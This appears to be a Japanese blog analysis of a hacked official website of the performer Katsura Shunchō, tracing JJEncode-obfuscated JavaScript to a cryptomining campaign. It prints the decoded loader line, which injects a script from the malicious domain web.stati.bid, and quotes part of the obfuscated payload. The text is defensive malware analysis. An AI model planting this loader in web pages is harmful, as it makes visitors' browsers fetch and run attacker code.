JavaScriptには詳しくないため、コードをまるごと検索につっこんで類似例を見つけたいところだが、記号が多用されたコードはそのままではぐぐれないので
"javascript obfuscator dollar underscore" といったキーワードで検索
すると下記の解説サイトがヒットし、JJEncodeというツールで難読化されたものであることがわかる
https://blog.korelogic.com/blog/2015/01/12
デコードツールも紹介されているのでさっそく試してみると、以下の結果が得られる
var el = document.createElement('script'); el.src = 'https://web.stati.bid/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.20'; document.head.appendChild(el);
次に "web.stati.bid" でぐぐると下記のブログがヒットする
それによると去年12月ぐらいから複数のサイトが改変被害に遭っていて、同じスクリプトを挿入されているらしい
飛び先のURLはいくつかあるが、中でもこのstati.bidドメインは今月登録されたばかりの非常に新しいもののようだ
https://blog.sucuri.net/2018/02/wikipedia-page-review-revealed-minr-malware.html
ちょうど英語Wikipediaでも同ドメインへ繋がるリンクが貼られて一悶着あったようだが、そのURLは桂春蝶サイトに埋め込まれていたURLと(パラメータ込みで)完全一致する
桂春蝶の公式サイト ttp://shunchou.jp/ にアクセスすると、Avastが遮断する。 警告は JS:Includer-BJQ [Trj] で、JavaScriptによるトロイのリンク埋め込みの判定だ。 ウイルスバスターなど、トレン...
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$...
JavaScriptには詳しくないため、コードをまるごと検索につっこんで類似例を見つけたいところだが、記号が多用されたコードはそのままではぐぐれないので "javascript obfuscator dollar underscore" ...